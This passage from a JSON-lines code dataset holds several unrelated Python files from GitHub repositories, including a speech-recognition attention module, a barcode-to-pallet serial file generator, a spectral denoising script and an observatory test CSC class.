loc_kernel_size, loc_kernel_num):\n super(Attention, self).__init__()\n\n # Setup\n self.v_dim = v_dim\n self.dim = dim\n self.mode = mode.lower()\n self.num_head = num_head\n\n # Linear proj. before attention\n self.proj_q = nn.Linear(q_dim, dim*num_head)\n self.proj_k = nn.Linear(v_dim, dim*num_head)\n self.v_proj = v_proj\n if v_proj:\n self.proj_v = nn.Linear(v_dim, v_dim*num_head)\n\n # Attention\n if self.mode == 'dot':\n self.att_layer = ScaleDotAttention(temperature, self.num_head)\n elif self.mode == 'loc':\n self.att_layer = LocationAwareAttention(\n loc_kernel_size, loc_kernel_num, dim, num_head, temperature)\n else:\n raise NotImplementedError\n\n # Layer for merging MHA\n if self.num_head > 1:\n self.merge_head = nn.Linear(v_dim*num_head, v_dim)\n\n # Stored feature\n self.key = None\n self.value = None\n self.mask = None\n\n def reset_mem(self):\n self.key = None\n self.value = None\n self.mask = None\n self.att_layer.reset_mem()\n\n def set_mem(self, prev_attn):\n self.att_layer.set_mem(prev_attn)\n\n def forward(self, dec_state, enc_feat, enc_len):\n\n # Preprecessing\n bs, ts, _ = enc_feat.shape\n query = torch.tanh(self.proj_q(dec_state))\n query = query.view(bs, self.num_head, self.dim).view(\n bs*self.num_head, self.dim) # BNxD\n\n if self.key is None:\n # Maskout attention score for padded states\n self.att_layer.compute_mask(enc_feat, enc_len.to(enc_feat.device))\n\n # Store enc state to lower computational cost\n self.key = torch.tanh(self.proj_k(enc_feat))\n self.value = torch.tanh(self.proj_v(\n enc_feat)) if self.v_proj else enc_feat # BxTxN\n\n if self.num_head > 1:\n self.key = self.key.view(bs, ts, self.num_head, self.dim).permute(\n 0, 2, 1, 3) # BxNxTxD\n self.key = self.key.contiguous().view(bs*self.num_head, ts, self.dim) # BNxTxD\n if self.v_proj:\n self.value = self.value.view(\n bs, ts, self.num_head, self.v_dim).permute(0, 2, 1, 3) # BxNxTxD\n self.value = self.value.contiguous().view(\n bs*self.num_head, ts, self.v_dim) # BNxTxD\n else:\n self.value = self.value.repeat(self.num_head, 1, 1)\n\n # Calculate attention\n context, attn = self.att_layer(query, self.key, self.value)\n if self.num_head > 1:\n context = context.view(\n bs, self.num_head*self.v_dim) # BNxD -> BxND\n context = self.merge_head(context) # BxD\n\n return attn, context\n\n\nclass Encoder(nn.Module):\n ''' Encoder (a.k.a. Listener in LAS)\n Encodes acoustic feature to latent representation, see config file for more details.'''\n\n def __init__(self, input_size, prenet, module, bidirection, dim, dropout, layer_norm, proj, sample_rate, sample_style):\n super(Encoder, self).__init__()\n\n # Hyper-parameters checking\n self.vgg = prenet == 'vgg'\n self.cnn = prenet == 'cnn'\n self.sample_rate = 1\n assert len(sample_rate) == len(dropout), 'Number of layer mismatch'\n assert len(dropout) == len(dim), 'Number of layer mismatch'\n num_layers = len(dim)\n assert num_layers >= 1, 'Encoder should have at least 1 layer'\n\n # Construct model\n module_list = []\n input_dim = input_size\n\n # Prenet on audio feature\n if self.vgg:\n vgg_extractor = VGGExtractor(input_size)\n module_list.append(vgg_extractor)\n input_dim = vgg_extractor.out_dim\n self.sample_rate = self.sample_rate*4\n if self.cnn:\n cnn_extractor = CNNExtractor(input_size, out_dim=dim[0])\n module_list.append(cnn_extractor)\n input_dim = cnn_extractor.out_dim\n self.sample_rate = self.sample_rate*4\n\n # Recurrent encoder\n if module in ['LSTM', 'GRU']:\n for l in range(num_layers):\n module_list.append(RNNLayer(input_dim, module, dim[l], bidirection, dropout[l], layer_norm[l],\n sample_rate[l], sample_style, proj[l]))\n input_dim = module_list[-1].out_dim\n self.sample_rate = self.sample_rate*sample_rate[l]\n else:\n raise NotImplementedError\n\n # Build model\n self.in_dim = input_size\n self.out_dim = input_dim\n self.layers = nn.ModuleList(module_list)\n\n def forward(self, input_x, enc_len):\n for _, layer in enumerate(self.layers):\n input_x, enc_len = layer(input_x, enc_len)\n return input_x, enc_len\n","repo_name":"Alexander-H-Liu/End-to-end-ASR-Pytorch","sub_path":"src/asr.py","file_name":"asr.py","file_ext":"py","file_size_in_byte":15234,"program_lang":"python","lang":"en","doc_type":"code","stars":1141,"dataset":"github-code","pt":"48"} +{"seq_id":"13038033120","text":"from last_palet_barcode import give_last_palet_barcode\r\nfrom give_serial_for_palets import give_Serials_for_palet\r\nfrom give_barcode_forpalet import give_barcode_forpalet\r\nimport os\r\nimport sys\r\nimport numpy as np\r\nimport re\r\n\r\n\r\ndef main(big_file_folder:str ,\r\n output_folder_name: str,\r\n output_file_name: str,\r\n packing_list_file_name: str,\r\n packing_list_folder_name: str,\r\n tarh: int,\r\n num_in_palet: int,\r\n start_index: int,\r\n accumulator: int,\r\n big_file_names_sorted):\r\n \r\n\r\n ### For barcodes:\r\n ### Last pallet has 2 extra \\n\r\n ### Others barcodes file have 1 extra \\n\r\n if len(big_file_names_sorted) != 1:\r\n path = os.path.join(big_file_folder, big_file_names_sorted[-1])\r\n last_palet_barcodes = give_last_palet_barcode(path)\r\n\r\n sizes = []\r\n for i in big_file_names_sorted:\r\n sizes.append(os.path.getsize(os.path.join(big_file_folder, i)))\r\n\r\n sizes = np.array(sizes)\r\n if np.unique(sizes).shape == (1,):\r\n # print('files have same sizes') \r\n num_last_palet = len(last_palet_barcodes)-1\r\n\r\n else:\r\n # print('files have different sizes') \r\n num_last_palet = len(last_palet_barcodes)-2\r\n\r\n total_barcodes = ((len(big_file_names_sorted)-1)*num_in_palet) + num_last_palet\r\n # starter indices in each output file\r\n STARTERS = np.arange(start_index, total_barcodes + start_index, num_in_palet)\r\n os.makedirs(output_folder_name, exist_ok=True)\r\n os.makedirs(packing_list_folder_name, exist_ok=True)\r\n \r\n # only one file exist\r\n else:\r\n path = os.path.join(big_file_folder, big_file_names_sorted[0]) \r\n last_palet_barcodes = give_last_palet_barcode(path)\r\n num_last_palet = len(last_palet_barcodes)-1\r\n last_palet_barcodes = last_palet_barcodes[:-1]\r\n total_barcodes = num_last_palet\r\n STARTERS = np.arange(start_index, total_barcodes + start_index , num_in_palet)\r\n os.makedirs(output_folder_name, exist_ok=True)\r\n os.makedirs(packing_list_folder_name, exist_ok=True)\r\n\r\n for fileNumber, Starter in enumerate(STARTERS):\r\n # processing first sub-txt file which is NOT the only one file also. \r\n if fileNumber == 0 and len(big_file_names_sorted) != 1 :\r\n\r\n if Starter >= 1e+6:\r\n add_zeros = False\r\n else:\r\n add_zeros = True\r\n\r\n # produce serial\r\n serial_for1palet = give_Serials_for_palet(num_in_palet=num_in_palet,\r\n total_barcodes=total_barcodes + start_index,\r\n tarh=tarh,\r\n accumulator=accumulator,\r\n starter=Starter,\r\n fileNumber=fileNumber+1,\r\n start_index = start_index,\r\n add_zeros=add_zeros)\r\n\r\n min_lenght = len(serial_for1palet[0])\r\n max_lenght = len(serial_for1palet[-1])\r\n\r\n serial_for1palet = np.array(serial_for1palet).reshape(-1, tarh)\r\n\r\n # get the barcodes\r\n path = os.path.join(big_file_folder, big_file_names_sorted[fileNumber])\r\n barcodes_for1palet = give_barcode_forpalet(path, num_in_palet)\r\n barcodes_for1palet = barcodes_for1palet.reshape(-1, tarh)\r\n\r\n # combine barcodes and serials\r\n output = np.dstack(\r\n (barcodes_for1palet, serial_for1palet)).flatten()\r\n output = output.reshape(-1, tarh*2)\r\n\r\n np.savetxt(\r\n f'{output_folder_name}/{output_file_name}_{fileNumber+1}.txt', output, delimiter=',', fmt='%s')\r\n\r\n packing_list_output = output.reshape(num_in_palet, 2)\r\n\r\n # serials = packing_list_output[:, 1]\r\n if min_lenght == max_lenght:\r\n\r\n packing_list_output = sorted(packing_list_output, key=lambda x: x[1])\r\n else:\r\n packing_list_output = sorted(packing_list_output, key= lambda x: natural_keys(x[1]))\r\n\r\n np.savetxt(f'{packing_list_folder_name}/{packing_list_file_name}_{fileNumber+1}.txt',\r\n packing_list_output, delimiter=',', fmt='%s')\r\n \r\n print(f\"making file % {int(((fileNumber+1)/len(big_file_names_sorted)) * 100)}\", end='\\r')\r\n\r\n # processing intermediate sub-txt files -not 1 and not last (between)\r\n if (fileNumber != STARTERS.shape[0]-1) & (fileNumber != 0):\r\n \r\n if Starter >= 1e+6:\r\n add_zeros = False\r\n else:\r\n add_zeros = True\r\n\r\n serial_for1palet = give_Serials_for_palet(num_in_palet=num_in_palet,\r\n total_barcodes=total_barcodes,\r\n tarh=tarh,\r\n accumulator=accumulator,\r\n starter=Starter,\r\n fileNumber=fileNumber+1,\r\n start_index = start_index,\r\n add_zeros=add_zeros)\r\n \r\n min_lenght = len(serial_for1palet[0])\r\n max_lenght = len(serial_for1palet[-1])\r\n\r\n serial_for1palet = np.array(serial_for1palet).reshape(-1, tarh)\r\n\r\n # get the barcodes\r\n path = os.path.join(big_file_folder, big_file_names_sorted[fileNumber])\r\n barcodes_for1palet = give_barcode_forpalet(path, num_in_palet)\r\n barcodes_for1palet = barcodes_for1palet.reshape(-1, tarh)\r\n\r\n # combine barcodes and serials\r\n output = np.dstack(\r\n (barcodes_for1palet, serial_for1palet)).flatten()\r\n output = output.reshape(-1, tarh*2)\r\n\r\n np.savetxt(\r\n f'{output_folder_name}/{output_file_name}_{fileNumber+1}.txt', output, delimiter=',', fmt='%s')\r\n\r\n packing_list_output = output.reshape(num_in_palet, 2)\r\n # serials = packing_list_output[:, 1]\r\n\r\n if min_lenght == max_lenght:\r\n packing_list_output = sorted(packing_list_output, key=lambda x: x[1])\r\n else:\r\n packing_list_output = sorted(packing_list_output, key= lambda x: natural_keys(x[1]))\r\n\r\n np.savetxt(f'{packing_list_folder_name}/{packing_list_file_name}_{fileNumber+1}.txt',\r\n packing_list_output, delimiter=',', fmt='%s')\r\n \r\n print(f\"making file % {int(((fileNumber+1)/len(big_file_names_sorted)) * 100)}\", end='\\r')\r\n\r\n\r\n # processing last sub-txt files or the only one\r\n if fileNumber == STARTERS.shape[0]-1 or len(big_file_names_sorted) == 1:\r\n if Starter >= 1e+6:\r\n add_zeros = False\r\n else:\r\n add_zeros = True\r\n\r\n serial_for1palet = give_Serials_for_palet(num_in_palet=num_last_palet,\r\n total_barcodes=total_barcodes,\r\n tarh=tarh,\r\n accumulator=accumulator,\r\n starter=Starter,\r\n fileNumber=fileNumber,\r\n last_file=True,\r\n add_zeros=add_zeros,\r\n start_index = start_index)\r\n \r\n min_lenght = len(serial_for1palet[0])\r\n max_lenght = len(serial_for1palet[-1])\r\n \r\n # get the barcodes\r\n if len(big_file_names_sorted) != 1:\r\n path = os.path.join(big_file_folder, big_file_names_sorted[fileNumber])\r\n barcodes_for1palet = give_last_palet_barcode(path)\r\n\r\n if np.unique(sizes).shape == (1,):\r\n\r\n barcodes_for1palet = barcodes_for1palet[:-1]\r\n else:\r\n barcodes_for1palet = barcodes_for1palet[:-2]\r\n else:\r\n barcodes_for1palet = last_palet_barcodes\r\n\r\n o = num_last_palet * 2\r\n n_rows_last_file = o // (tarh * 2)\r\n n_last_row_last_file = o - (n_rows_last_file * tarh * 2)\r\n\r\n p = num_last_palet // tarh # Calculate if all num_last_palet fits in tarh or not\r\n j = num_last_palet - p * tarh\r\n output = np.dstack(\r\n (barcodes_for1palet, serial_for1palet)).flatten()\r\n\r\n if j != 0:\r\n\r\n t = output[:-n_last_row_last_file].reshape(-1, tarh*2)\r\n t2 = output[-n_last_row_last_file:]\r\n t2 = t2.tolist()\r\n \r\n np.savetxt(\r\n f'{output_folder_name}/{output_file_name}_{fileNumber+1}.txt', t, delimiter=',', fmt='%s')\r\n \r\n with open(f'{output_folder_name}/{output_file_name}_{fileNumber+1}.txt', 'a') as f:\r\n for item in t2:\r\n f.write('%s,' % item)\r\n\r\n else:\r\n np.savetxt(\r\n f'{output_folder_name}/{output_file_name}_{fileNumber+1}.txt', output.reshape(-1, tarh*2), delimiter=',', fmt='%s')\r\n\r\n packing_list_output = output.reshape(-1, 2)\r\n\r\n # serials = packing_list_output[:, 1]\r\n\r\n if min_lenght == max_lenght:\r\n packing_list_output = sorted(packing_list_output, key=lambda x: x[1])\r\n else:\r\n packing_list_output = sorted(packing_list_output, key= lambda x: natural_keys(x[1]))\r\n\r\n np.savetxt(f'{packing_list_folder_name}/{packing_list_file_name}_{fileNumber+1}.txt',\r\n packing_list_output, delimiter=',', fmt='%s')\r\n \r\n print(f\"making file % {int(((fileNumber+1)/len(big_file_names_sorted)) * 100)}\", end='\\r')\r\n print(\"Done successfully!\")\r\n\r\ndef atoi(text):\r\n return int(text) if text.isdigit() else text\r\n\r\ndef natural_keys(text):\r\n return [atoi(c) for c in re.split(r'(\\d+)', text)]\r\n\r\nif __name__ == '__main__':\r\n # give_barcode(big_file, 6120000)\r\n # big_file = 'Pocket_14001114_Letter_3966575_Part1_236Milion.txt'\r\n\r\n # big_file_folder = \"big_folder_12mil\"\r\n # num_in_palet = 400_000\r\n # tarh = 32\r\n # start_index = 1\r\n # output_folder_name = \"output_folder\"\r\n # output_file_name = \"out\"\r\n # packing_list_folder_name = \"packing_folder\"\r\n # packing_list_file_name = \"packing\"\r\n # accumulator = 500\r\n\r\n big_file_folder = input('big_file_folder: ')\r\n assert os.path.exists(big_file_folder), f\"{big_file_folder} does NOT exists !\"\r\n num_in_palet = int(input('num_in_palet: '))\r\n\r\n big_file_names = os.listdir(big_file_folder)\r\n big_file_names.sort(key=natural_keys) \r\n\r\n number_barcodes_in_each_file = 0\r\n if len(big_file_names) != 1:\r\n with open(os.path.join(big_file_folder, big_file_names[0])) as f :\r\n for line in f:\r\n number_barcodes_in_each_file += 1\r\n\r\n assert number_barcodes_in_each_file == num_in_palet, f\"number of palet provided is {num_in_palet} but in each file there are {number_barcodes_in_each_file} barcodes\"\r\n\r\n tarh = int(input('tarh: '))\r\n\r\n assert num_in_palet % tarh == 0, f\"{num_in_palet} (pallet number) should be devisible by 'tarh'\"\r\n\r\n start_index = int(input(\"start index : \"))\r\n output_folder_name = input('output_folder_name: ')\r\n output_file_name = input('output_file_name: ')\r\n packing_list_folder_name = input('packing_list_folder_name: ')\r\n packing_list_file_name = input('packing_list_file_name: ')\r\n\r\n accumulator = int(input('accumulator: '))\r\n\r\n\r\n\r\n main(big_file_folder=big_file_folder,\r\n output_folder_name=output_folder_name,\r\n output_file_name=output_file_name,\r\n packing_list_file_name=packing_list_file_name,\r\n packing_list_folder_name=packing_list_folder_name,\r\n tarh=tarh,\r\n num_in_palet=num_in_palet,\r\n start_index = start_index,\r\n accumulator = accumulator,\r\n big_file_names_sorted = big_file_names)\r\n","repo_name":"ImanGoudarzvand/Barcode-Serial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42056155115","text":"import bmxobs as bmx\nimport matplotlib.pyplot as plt \nimport numpy as np\nimport scipy.optimize as opt\nimport scipy.signal as sgn \nimport os \n\ndef linear(x,a,b):\n return a*x+b\n\n\n################denoising###################\ndef denoise(dat_file,channel, n_pix, Time = [0,1]):\n \n print(\"denoising\")\n #Determine the fit constants a,b in af+b for every time step\n data = np.transpose(dat_file[int(channel)])\n freq = dat_file.freq[int(channel[2])]\n x_fit_top = freq[freq.size-n_pix:freq.size]\n x_fit_bot = freq[0:n_pix]\n\n size = data[0].size\n fit_array = np.zeros(shape = (4,size))\n for iter in np.arange(size):\n y_fit_top = np.flip(np.transpose(data[0:n_pix, iter]))\n y_fit_bot = np.flip(np.transpose(data[np.shape(data)[0]-n_pix:np.shape(data)[0], iter]))\n const_out_top, junk = opt.curve_fit(linear, x_fit_top, y_fit_top)\n const_out_bot, junk = opt.curve_fit(linear,x_fit_bot,y_fit_bot)\n\n const_out_top = np.transpose(const_out_top)\n const_out_bot = np.transpose(const_out_bot)\n fit_array[:,iter] = np.concatenate((const_out_top,const_out_bot), axis = 0)\n\n os.system('clear')\n per = 100*float(iter)/float(size)\n print(\"%.5f\" % per, \"% of denoising done\")\n \n\n avg_fit_array = np.empty(shape = (2,data[0].size))\n avg_fit_array[0,:] = (fit_array[0,:]+fit_array[2,:])/2.0\n avg_fit_array[1,:] = (fit_array[1,:]+fit_array[3,:])/2.0\n\n #Smoothen fit of (a,b) to determine gain\n Times = np.linspace(Time[0], Time[1], num = data[0,:].size, endpoint = True)\n\n for i in np.arange(0,2):\n avg_fit_array[i,:] = sgn.savgol_filter(avg_fit_array[i,:], 1001, 3)\n \n\n gain_array = np.zeros(shape = np.shape(data))\n\n for iter in np.arange(data[0].size):\n gain_array[:,iter] = np.flip(linear(freq, avg_fit_array[0,iter], avg_fit_array[1,iter]))\n \n ones = np.ones(shape = np.shape(data))\n\n denoised_out = np.divide(data,gain_array) - ones \n return denoised_out","repo_name":"gabbita-ss/Portfolio","sub_path":"BMX/denoise.py","file_name":"denoise.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73333577106","text":"from gamma_n import *\nimport scipy.io as sio\nfrom progress.bar import Bar\ndef nepbCTDExtract(fname):\n ctddata = sio.loadmat(fname)\n lats = np.asarray(ctddata[\"lat\"])[0]\n lons = np.asarray(ctddata[\"lon\"])[0]\n pres = np.asarray(ctddata[\"Pint\"]).T[0]\n sals = np.asarray(ctddata[\"Sint\"]).T\n thetas = np.asarray(ctddata[\"Tint\"]).T\n CT = np.asarray(ctddata[\"CT\"]).T\n SA = np.asarray(ctddata[\"Sint_abs\"]).T\n nspres = np.asarray(ctddata[\"P_gamma\"]).T\n PV = np.asarray(ctddata[\"PV\"]).T\n ns = np.asarray(ctddata[\"P_gref\"])\n profiles = []\n gammas = []\n for p in Bar(\"profile\").iter(range(int(len(lats)))):\n data = {}\n knownns = {}\n knownpv = {}\n if lats[p]>20 and lons[p]<0 or lons[p] > 170:\n data[\"lat\"]=lats[p]\n data[\"lon\"]=lons[p]\n data[\"temp\"]=[]\n data[\"sal\"]=[]\n data[\"pres\"]=[]\n for j in range(len(pres)-20):\n if ~np.isnan(sals[p][j]) and ~np.isnan(thetas[p][j]) and ~np.isnan(pres[j])\\\n and abs(pres[j]) < 10000 and abs(thetas[p][j])<30 and abs(sals[p][j])<50:\n insitutemp = thetas[p][j]\n practicalsal = sals[p][j]\n singlepres = abs(pres[j])\n abssal = gsw.SA_from_SP(practicalsal,singlepres,lons[p],lats[p])\n conservativetemp = gsw.CT_from_t(abssal,insitutemp,singlepres)\n if abs(abssal-SA[p][j]) > 0.001:\n print(\"saldiff = \",abssal-SA[p][j])\n if abs(conservativetemp-CT[p][j]) > 0.001:\n print(\"tempdiff = \",conservativetemp-CT[p][j])\n data[\"temp\"].append(insitutemp)\n data[\"sal\"].append(practicalsal)\n data[\"pres\"].append(singlepres)\n print(\"beep\")\n gamma,debug = gamma_n(data[\"sal\"],data[\"temp\"],data[\"pres\"],data[\"lon\"],data[\"lat\"])\n print(\"boop\")\n gammas.append(np.asarray(gamma))\n return np.asarray(gammas)\n\ngammas = nepbCTDExtract(\"testingdata/newnepbdata.mat\")\nplt.plot(gammas.T[0])\nplt.show()\n\n\n","repo_name":"garrettdreyfus/py-gamma-n","sub_path":"pygamma_n/testing/nepbtest.py","file_name":"nepbtest.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"28741803816","text":"__all__ = [\"TestCsc\", \"run_test_csc\"]\n\nimport asyncio\nimport string\nimport types\nimport typing\nfrom collections.abc import Sequence\n\nimport numpy as np\n\nfrom . import __version__, type_hints\nfrom .base_csc import State\nfrom .config_schema import CONFIG_SCHEMA\nfrom .configurable_csc import ConfigurableCsc\n\n\nclass TestCsc(ConfigurableCsc):\n \"\"\"A simple CSC intended for unit testing.\n\n Supported commands:\n\n * ``setScalars`` and ``setArrays``: output the provided data using the\n corresponding event and telemetry topics. Note that this violates\n the convention that telemetry is output at regular intervals,\n but it makes unit tests much easier to write.\n * ``wait``: wait for the specified amount of time, and, if requested,\n raise an exception. One use for this is to test command timeout\n by specifying a long wait and waiting a shorter time for the command\n to finish. Another use is to test multiple simultaneous commands,\n since ``wait`` supports this.\n * The standard state transition commands do the usual thing\n and output the ``summaryState`` event. The ``exitControl``\n command shuts the CSC down.\n\n Parameters\n ----------\n index : `int`\n Index of Test component; each unit test method\n should use a different index.\n config_dir : `str`, optional\n Path to configuration files.\n check_if_duplicate : `bool`, optional\n Check for heartbeat events from the same SAL name and index\n at startup (before starting the heartbeat loop)?\n Defaults to False in order to speed up unit tests,\n but `amain` sets it true.\n initial_state : `salobj.State`, optional\n The initial state of the CSC. Typically one of:\n\n * `salobj.State.ENABLED` if you want the CSC immediately usable.\n * `salobj.State.STANDBY` if you want full emulation of a CSC.\n override : `str`, optional\n Configuration override file to apply if ``initial_state`` is\n `State.DISABLED` or `State.ENABLED`.\n simulation_mode : `int`, optional\n Simulation mode. The only allowed value is 0.\n\n\n Raises\n ------\n ValueError\n If ``config_dir`` is not a directory or ``initial_state`` is invalid.\n salobj.ExpectedError\n If ``simulation_mode`` is invalid.\n Note: you will only see this error if you await `start_task`.\n\n Notes\n -----\n Unlike a normal CSC this one does not output telemetry at regular\n intervals. Instead, in order to simplify unit tests, it outputs\n the ``arrays`` and ``scalars`` telemetry topics in reponse to\n the ``setArrays`` or ``setScalars`` command (just like the ``arrays``\n and ``scalars`` events). That makes it more predictable when this\n data will appear. Note that the ``heartbeat`` event is output at\n regular intervals, as for any CSC.\n\n Also, unlike most normal configurable CSCs, this one does not need to be\n configured in order to be used (though self.config will be None).\n Thus it is safe to start this CSC in the `salobj.State.ENABLED` state.\n\n **Error Codes**\n\n * 1: the fault command was executed\n \"\"\"\n\n enable_cmdline_state = True\n valid_simulation_modes = [0]\n version = __version__\n __test__ = False # Stop pytest from warning that this is not a test.\n\n def __init__(\n self,\n index: int,\n config_dir: type_hints.PathType | None = None,\n check_if_duplicate: bool = False,\n initial_state: State = State.STANDBY,\n override: str = \"\",\n simulation_mode: int = 0,\n ):\n super().__init__(\n name=\"Test\",\n index=index,\n config_schema=CONFIG_SCHEMA,\n config_dir=config_dir,\n check_if_duplicate=check_if_duplicate,\n initial_state=initial_state,\n override=override,\n simulation_mode=simulation_mode,\n )\n self.cmd_wait.allow_multiple_callbacks = True # type: ignore\n self.config: types.SimpleNamespace | None = None\n\n def as_dict(self, data: typing.Any, fields: Sequence[str]) -> dict[str, typing.Any]:\n \"\"\"Return the specified fields from a data struct as a dict.\n\n Parameters\n ----------\n data : `any`\n The data to copy.\n fields : `list` [`str`]\n The names of the fields of ``data`` to copy.\n \"\"\"\n ret = dict()\n for field in fields:\n ret[field] = getattr(data, field)\n return ret\n\n async def do_setArrays(self, data: type_hints.BaseMsgType) -> None:\n \"\"\"Execute the setArrays command.\"\"\"\n self.assert_enabled()\n self.log.info(\"executing setArrays\")\n data_dict = self.as_dict(data, self.arrays_fields)\n await self.evt_arrays.set_write(**data_dict) # type: ignore\n await self.tel_arrays.set_write(**data_dict) # type: ignore\n\n async def do_setScalars(self, data: type_hints.BaseMsgType) -> None:\n \"\"\"Execute the setScalars command.\"\"\"\n self.assert_enabled()\n self.log.info(\"executing setScalars\")\n data_dict = self.as_dict(data, self.scalars_fields)\n await self.evt_scalars.set_write(**data_dict) # type: ignore\n await self.tel_scalars.set_write(**data_dict) # type: ignore\n\n async def do_fault(self, data: type_hints.BaseMsgType) -> None:\n \"\"\"Execute the fault command.\n\n Change the summary state to State.FAULT\n \"\"\"\n self.log.warning(\"executing the fault command\")\n await self.fault(code=1, report=\"executing the fault command\")\n\n async def do_wait(self, data: type_hints.BaseMsgType) -> None:\n \"\"\"Execute the wait command by waiting for the specified duration.\n\n If duration is negative then wait for abs(duration) but do not\n acknowledge the command as \"in progress\". This is useful for\n testing command timeout.\n \"\"\"\n self.assert_enabled()\n duration: float = data.duration # type: ignore\n if duration >= 0:\n await self.cmd_wait.ack_in_progress(data, timeout=duration) # type: ignore\n await asyncio.sleep(abs(duration))\n\n @property\n def field_type(self) -> dict[str, typing.Any]:\n \"\"\"Get a dict of field_name: element type.\"\"\"\n return dict(\n boolean0=bool,\n byte0=np.uint8,\n short0=np.int16,\n int0=np.int32,\n long0=np.int32,\n longLong0=np.int64,\n unsignedShort0=np.uint16,\n unsignedInt0=np.uint32,\n float0=np.single,\n double0=np.double,\n string0=str,\n )\n\n @property\n def arrays_fields(self) -> Sequence[str]:\n \"\"\"Get a tuple of the fields in an arrays struct.\"\"\"\n return (\n \"boolean0\",\n \"byte0\",\n \"short0\",\n \"int0\",\n \"long0\",\n \"longLong0\",\n \"unsignedShort0\",\n \"unsignedInt0\",\n \"float0\",\n \"double0\",\n )\n\n @property\n def scalars_fields(self) -> Sequence[str]:\n \"\"\"Get a tuple of the fields in a scalars struct.\"\"\"\n return (\n \"boolean0\",\n \"byte0\",\n \"short0\",\n \"int0\",\n \"long0\",\n \"longLong0\",\n \"unsignedShort0\",\n \"unsignedInt0\",\n \"float0\",\n \"double0\",\n \"string0\",\n )\n\n @property\n def int_fields(self) -> Sequence[str]:\n \"\"\"Get a tuple of the integer fields in a struct.\"\"\"\n return (\n \"byte0\",\n \"short0\",\n \"int0\",\n \"long0\",\n \"longLong0\",\n \"unsignedShort0\",\n \"unsignedInt0\",\n )\n\n def assert_arrays_equal(self, arrays1: typing.Any, arrays2: typing.Any) -> None:\n \"\"\"Assert that two arrays data structs are equal.\n\n The types need not match; each struct can be command, event\n or telemetry data, or a dict of field: value.\n \"\"\"\n # use reversed so boolean0 is not compared first,\n # as a discrepancy there is harder to interpret\n if isinstance(arrays1, dict):\n arrays1 = types.SimpleNamespace(**arrays1)\n if isinstance(arrays2, dict):\n arrays2 = types.SimpleNamespace(**arrays2)\n for field in reversed(self.arrays_fields):\n field_arr1 = getattr(arrays1, field)\n field_arr2 = getattr(arrays2, field)\n is_float = field in (\"float0\", \"double0\")\n if not np.array_equal( # type: ignore\n field_arr1, field_arr2, equal_nan=is_float\n ):\n raise AssertionError(\n f\"arrays1.{field} = {field_arr1} != {field_arr2} = arrays2.{field}\"\n )\n\n def assert_scalars_equal(self, scalars1: typing.Any, scalars2: typing.Any) -> None:\n \"\"\"Assert that two scalars data structs are equal.\n\n The types need not match; each struct can be command, event\n or telemetry data, or a dict of field: value.\n \"\"\"\n if isinstance(scalars1, dict):\n scalars1 = types.SimpleNamespace(**scalars1)\n if isinstance(scalars2, dict):\n scalars2 = types.SimpleNamespace(**scalars2)\n\n # use reversed so boolean0 is not compared first,\n # as a discrepancy there is harder to interpret\n for field in reversed(self.scalars_fields):\n field_val1 = getattr(scalars1, field)\n field_val2 = getattr(scalars2, field)\n is_float = field in (\"float0\", \"double0\")\n if not np.array_equal( # type: ignore\n field_val1, field_val2, equal_nan=is_float\n ):\n raise AssertionError(\n f\"scalars1.{field} = {field_val1} != {field_val2} = scalars2.{field}\"\n )\n\n def make_random_arrays_dict(self) -> dict[str, typing.Any]:\n \"\"\"Make a random arrays data dict.\"\"\"\n arrays_dict: dict[str, typing.Any] = dict()\n blank_arrays_data = self.evt_arrays.DataType() # type: ignore\n nelts = len(blank_arrays_data.boolean0)\n arrays_dict[\"boolean0\"] = np.random.choice([False, True], size=(nelts,))\n for field in self.int_fields:\n field_type = self.field_type[field]\n nelts = len(getattr(blank_arrays_data, field))\n iinfo = np.iinfo(field_type)\n arrays_dict[field] = np.random.randint(\n iinfo.min, iinfo.max, size=(nelts,), dtype=field_type\n )\n for field in (\"float0\", \"double0\"):\n field_type = self.field_type[field]\n nelts = len(getattr(blank_arrays_data, field))\n arrays_dict[field] = np.array(\n np.random.uniform(-1e5, 1e5, size=(nelts,)), dtype=field_type\n )\n return arrays_dict\n\n def make_random_scalars_dict(self) -> dict[str, typing.Any]:\n \"\"\"Make a random arrays data dict.\"\"\"\n scalars_dict: dict[str, typing.Any] = dict()\n scalars_dict[\"boolean0\"] = bool(np.random.choice([False, True]))\n printable_chars = [c for c in string.printable]\n scalars_dict[\"string0\"] = \"\".join(np.random.choice(printable_chars, size=(20,)))\n for field in self.int_fields:\n field_type = self.field_type[field]\n iinfo = np.iinfo(field_type)\n scalars_dict[field] = np.random.randint(\n iinfo.min, iinfo.max, dtype=field_type\n )\n for field in (\"float0\", \"double0\"):\n field_type = self.field_type[field]\n scalars_dict[field] = field_type(np.random.uniform(-1e5, 1e5))\n return scalars_dict\n\n @staticmethod\n def get_config_pkg() -> str:\n return \"ts_config_ocs\"\n\n async def configure(self, config: types.SimpleNamespace) -> None:\n self.config = config\n\n\ndef run_test_csc() -> None:\n \"\"\"Run the Test CSC from the command line.\"\"\"\n asyncio.run(TestCsc.amain(index=True))\n","repo_name":"lsst-ts/ts_salobj","sub_path":"python/lsst/ts/salobj/testcsc.py","file_name":"testcsc.py","file_ext":"py","file_size_in_byte":11993,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"3686597680","text":"info = {'other_info': {'a': 1, 'b': 2}, 'lst': ['c', 'd', 'e']}\nnew_info = {}\n\nfor key, value in info.items():\n if isinstance(value, dict): \n temp_dict = {}\n for key2, value2 in value.items():\n temp_dict[key2] = value2\n new_info[key] = temp_dict\n elif isinstance(value, list):\n temp_lst = []\n for key2, value2 in enumerate(value):\n temp_lst.append(value2)\n new_info[key] = temp_lst\n\nprint(info)\nprint('-' * 50)\nprint(new_info)\n\nprint('-' * 50)\nprint(id(info))\nprint(id(new_info))\n","repo_name":"prernaniraj/Python-Basics-Practice","sub_path":"shallow_copy_without_inbuilt_method.py","file_name":"shallow_copy_without_inbuilt_method.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35274963712","text":"'''Development settings and globals.'''\n\nfrom 